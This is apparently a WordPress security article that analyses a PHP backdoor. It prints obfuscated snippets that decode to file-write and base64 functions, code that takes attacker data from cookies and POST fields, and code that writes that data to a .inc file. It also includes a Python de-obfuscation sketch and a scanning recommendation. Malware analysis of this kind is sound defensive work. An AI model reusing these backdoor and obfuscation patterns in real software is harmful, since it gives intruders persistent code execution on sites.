This section describes a type of malware whose code contains strings of backslashes and numbers, such as “\x74” or “\x5f”.


Encrypted Code

This type of malware creates malicious programs with random-string file names and .php extensions in multiple folders under the WordPress installation folder.

Let's look at the first few lines:

$qohnpiqep = "\146".chr(105).'l'.chr(101).chr(95)."\x70".chr(117)."\x74"."\x5f".chr(99)."\157".chr(110).chr(150-34).'e'.chr(497-387).'t'.chr(115);
$wcwij = "\142"."\x61".chr(115).chr(129-28).'6'.'4'.chr(95)."\144"."\145".chr(99)."\157"."\x64"."\x65";
$pgovfimf = chr(898-793).chr(110).chr(949-844).chr(361-266).'s'.'e'."\164";
$zefyoag = "\x75"."\156".chr(1023-915).chr(105)."\x6e".chr(428-321);

Expressions such as chr(101) and “\x74” are obfuscated forms of the individual characters of a string. Hackers often obfuscate code this way to make it difficult to read at a glance.
The following is the result of de-obfuscating the code.

$qohnpiqep = "file_put_contents";
$wcwij = "base64_decode";
$pgovfimf = "ini_set";
$zefyoag = "unlink";

file_put_contents is the function that writes data to a file, and base64_decode is the function that decodes Base64-encoded data back into its original form. Malware very often obfuscates these names so that the calls are not detected.
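The de-obfuscation shown above can also be done statically, without running any of the PHP. The following Python sketch is an added example, not code from the original article: the function names, the regular expressions and the sample lines are assumptions constructed for illustration, and it also covers chr(A+B) in addition to the chr(A-B) form seen in the listing.

```python
import re

# One piece: chr(N), chr(A+B) / chr(A-B), a "double-quoted" or a 'single-quoted' literal.
P = r"""chr\(\s*(\d+)\s*(?:([+-])\s*(\d+)\s*)?\)|"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'"""
PIECE = re.compile(P, re.S)
WHOLE = re.compile(rf"(?:{P})(?:\s*\.\s*(?:{P}))*", re.S)   # pieces joined by the PHP "." operator
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)", re.S)
SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f", "e": "\x1b", "\\": "\\", '"': '"'}
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=\s*(.+?);\s*$", re.M)

def _expand(body):
    """Expand PHP double-quote escapes: \\xHH, octal \\OOO, \\n etc. (\\u{...} is not handled)."""
    def repl(m):
        hx, oc, ch = m.groups()
        if hx or oc:
            return chr(int(hx, 16) if hx else int(oc, 8) & 0xFF)  # PHP wraps octal above \377
        return SIMPLE.get(ch, "\\" + ch)                          # unknown escapes keep the backslash
    return ESCAPE.sub(repl, body)

def fold_php_concat(expr):
    """Resolve a chr()/literal concatenation without executing PHP; None for anything else."""
    expr = expr.strip()
    if not WHOLE.fullmatch(expr):
        return None
    out = []
    for num, op, rhs, dq, sq in PIECE.findall(expr):
        if num:
            n = int(num) + (int(rhs) if op == "+" else -int(rhs)) if op else int(num)
            out.append(chr(n % 256))                 # PHP chr() works modulo 256
        elif "$" in dq:
            return None                              # conservative: "$" may start interpolation
        else:
            out.append(_expand(dq) if dq else re.sub(r"\\([\\'])", r"\1", sq))
    return "".join(out)

def decode_assignments(source):
    """Map every `$var = <constant concatenation>;` line to the string it builds."""
    folded = {var: fold_php_concat(expr) for var, expr in ASSIGN.findall(source)}
    return {var: s for var, s in folded.items() if s is not None}

# Constructed sample in the obfuscation style shown above (not taken from a live site).
SAMPLE = r'''
$v1 = "\x75"."\156".chr(1023-915).chr(105)."\x6e".chr(428-321);
$v2 = chr(898-793).chr(110).chr(949-844).chr(361-266).'s'.'e'."\164";
$v3 = "./" . md5($key) . "\x2e".chr(105).chr(710-600)."\143";
'''

if __name__ == "__main__":
    print(decode_assignments(SAMPLE))
```

Lines that mix in function calls or variables, such as the $v3 line in the sample, are skipped rather than guessed at, so a decoded name like unlink or ini_set in the output is always the result of constant folding alone.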

We will look at the processing part below that.

$cgzit = array_merge($_COOKIE, $_POST);

This part receives the malicious program data sent by the hacker through cookies and POST parameters. The following part then decrypts the received data:

$xtirwbjmmx = @unserialize(xjwnspw(xjwnspw($wcwij($xtirwbjmmx), $ohfrxyct), $pslyhezy));

After decryption, the path of the file to write is built in the following part:

$cngjt = "./" . md5($ohfrxyct) . "\x2e".chr(105).chr(710-600)."\143";

The file is written out under the “./” path.

Let’s try to further deobfuscate this part.

$cngjt = "./" . md5($ohfrxyct) . ".inc";

The file name is md5($ohfrxyct) followed by “.inc”. We can see that arbitrary code sent by the hacker is written out under a random-looking file name ending in .inc, where it can be executed at any time.

This means that this file is a backdoor, a type of file through which hackers write malicious programs on the server.

Recent malware with no actual processing

Much recent WordPress malware is of the type that writes or executes arbitrary programs sent by hackers over the network through a backdoor.

In other words, the backdoor only executes the files and data transmitted to it. Because this mechanism allows arbitrary programs to be executed on the server at any time, the malware itself contains no actual processing on the server side.

This means that it is difficult to investigate the full extent of the malicious activity because what the hacker did on the server can change from moment to moment.

What to do if you suspect this type of malware infection?

First, perform a malware scan of all WordPress files on the server.

Free WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].

In addition, please refer to the following to improve the security of your WordPress site, which will greatly reduce the risk of further malware infection.

5 free WordPress security measures